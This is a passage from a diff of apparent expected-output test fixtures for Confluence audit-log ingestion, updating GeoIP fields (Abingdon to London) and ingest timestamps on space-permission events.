user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1911,20 +1797,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1932,7 +1812,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222408976Z", + "ingested": "2021-12-14T14:34:31.513207539Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.862Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2010,20 +1890,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2031,7 +1905,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222410888Z", + "ingested": "2021-12-14T14:34:31.513208009Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.858Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2116,20 +1990,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2137,7 +2005,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222412778Z", + "ingested": "2021-12-14T14:34:31.513208509Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.853Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2222,20 +2090,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2243,7 +2105,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222414716Z", + "ingested": "2021-12-14T14:34:31.513208910Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.848Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2328,20 +2190,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2349,7 +2205,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222416708Z", + "ingested": "2021-12-14T14:34:31.513209516Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.841Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2427,20 +2283,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2448,7 +2298,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222418620Z", + "ingested": "2021-12-14T14:34:31.513210024Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.832Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2533,20 +2383,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2554,7 +2398,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222420509Z", + "ingested": "2021-12-14T14:34:31.513210417Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.821Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2639,20 +2483,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2660,7 +2498,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222422409Z", + "ingested": "2021-12-14T14:34:31.513210868Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.811Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2745,20 +2583,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2766,7 +2598,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222424328Z", + "ingested": "2021-12-14T14:34:31.513211280Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.796Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2844,20 +2676,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2865,7 +2691,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222426219Z", + "ingested": "2021-12-14T14:34:31.513211683Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.785Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2950,20 +2776,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -2971,7 +2791,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222428101Z", + "ingested": "2021-12-14T14:34:31.513212078Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.777Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3056,20 +2876,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3077,7 +2891,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222430092Z", + "ingested": "2021-12-14T14:34:31.513212814Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.770Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3162,20 +2976,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3183,7 +2991,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222431970Z", + "ingested": "2021-12-14T14:34:31.513213264Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.756Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3261,20 +3069,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3282,7 +3084,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222433858Z", + "ingested": "2021-12-14T14:34:31.513213749Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.751Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3367,20 +3169,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3388,7 +3184,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222435741Z", + "ingested": "2021-12-14T14:34:31.513214244Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.744Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3473,20 +3269,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3494,7 +3284,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222437726Z", + "ingested": "2021-12-14T14:34:31.513214876Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.728Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test 